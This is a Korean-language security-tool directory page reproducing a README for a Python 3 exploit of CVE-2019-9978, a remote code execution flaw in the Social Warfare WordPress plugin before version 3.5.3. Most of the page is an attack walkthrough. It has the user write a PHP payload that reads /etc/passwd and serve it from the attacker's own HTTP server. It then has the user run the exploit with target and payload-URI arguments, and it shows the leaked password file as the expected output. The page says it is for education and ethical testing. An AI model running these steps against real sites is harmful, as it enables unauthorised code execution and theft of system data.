Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-9978 — WordPress용 Social Warfare 플러그인에서 발견된 원격 코드 실행(RCE) 취약점으로, 3.5.3 미만 버전에 영향을 미칩니다. | Kitploit
도구/GitHubGitHub/echoosso/cve-2019-9978
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubechoosso/cve-2019-9978

CVE-2019-9978

WordPress용 Social Warfare 플러그인에서 발견된 원격 코드 실행(RCE) 취약점으로, 3.5.3 미만 버전에 영향을 미칩니다.

저장소 보기
121년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-9978 - Social Warfare WordPress 플러그인 RCE < 3.5.3

Social Warfare WordPress 플러그인의 원격 코드 실행(RCE) 취약점으로, 3.5.3 미만의 모든 버전에 영향을 미칩니다.


💡 동기

기존 공개 익스플로잇은 구버전 Python으로 작성되어 최신 환경에서 제대로 실행되지 않습니다.
이 익스플로잇을 Python 3와 완전히 호환되도록 재작성하여 사용, 이해 및 최신 도구에 통합하기 쉽게 만들었습니다.


개념 증명 (PoC)

✅ 1단계 – 페이로드 생성

다음 내용으로 payload.txt 파일을 생성합니다:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

✅ 2단계 – Python HTTP 서버 시작

Python을 사용하여 페이로드를 제공합니다:

root@kitploit:~
python3 -m http.server 8000

그러면 payload.txt에 다음 주소로 접근할 수 있습니다:

root@kitploit:~
http://<your-ip>:8000/payload.txt

✅ 3단계 – 익스플로잇 실행

root@kitploit:~
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt

예상 출력

대상이 취약한 경우 다음 출력과 유사한 결과를 받게 됩니다:

root@kitploit:~
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

스크린샷

HTTP 서버가 요청을 수신함

http-server

성공적인 익스플로잇 실행

exploit

페이로드 파일 내용

payload


🧬 이 페이로드가 유용했다면, 별표(⭐) 하나 눌러주시면 감사하겠습니다.

기술적 세부사항

  • 플러그인: Social Warfare
  • 영향을 받는 버전: < 3.5.3
  • CVE: CVE-2019-9978
  • 취약점 유형: 원격 코드 실행 (RCE)
  • 원작자: @hash3liZer
  • 연구자: Luka Sikic

크레딧

  • 익스플로잇 작성자: @hash3liZer
  • Python 3 재작업: @echosso

⚠️ 면책 조항: 이 저장소는 교육 및 윤리적 테스트 목적으로만 제공됩니다.
본인이 소유하지 않은 시스템에서 이 익스플로잇을 무단으로 사용하는 것은 엄격히 금지됩니다.

도구 다운로드